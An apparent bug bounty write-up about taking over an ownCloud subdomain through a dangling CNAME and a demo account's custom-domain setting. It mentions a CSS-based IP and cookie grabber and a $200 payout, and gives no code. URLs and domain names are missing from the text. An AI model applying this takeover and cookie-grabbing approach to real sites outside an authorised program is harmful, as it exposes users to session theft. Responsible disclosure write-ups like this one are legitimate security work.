Subdomain takeover [Awarded $200]

The story is simple, the reward was “alright”. Let’s start. ^_^

I came across a website known as ownCloud. Their bug bounty program is located here — and their H1 program is located here

Their bounty program looked nice and juicy and I wanted some dough ( 🤑 )

So I ran [pretty sure everyone is aware of this] and I came cross a domain that was displayed as

So I did a quick search on their CNAME and it points to but somehow wasn’t reflecting back on their domain. CNAME check tool I used —

I then registered on a demo account and saw that they had a custom page to set whichever domain you wanted.

I then pointed the domain to my testing domain on and saw that my inputs reflected over to

I also noticed that they had an advanced page in the settings page which allows you to use CSS. I cooked up an IP grabber and a cookies grabber code via CSS to show the escalation of this.

I swiftly reported it and in 2 hours, the issue was fixed via email. I was then told to send the report on HackerOne and I got my bounty.

I thought I would have gotten $5k for their subdomain takeover, but turns out it was $200 since .ownCloud was out of scope. However, I’d deem this as a very high security risk and the payout should have been more, but what can you do — the company has “more rights” to your inputs than you yourself.

Grateful- but not satisfy.


4/20/2019 issue was reported. — 2 hours later the issue was fixed.

Via email talks 3 weeks 5/6/2019.

Paid out on 5/7/2019–$200.

Worth it? Not sure.

Thanks for reading.

If you have questions regarding this, then feel free to shoot me a DM on Twitter or, join our Discord Server to talk to any of the hundreds of people for help, or just looking to talk to other Hax0rs.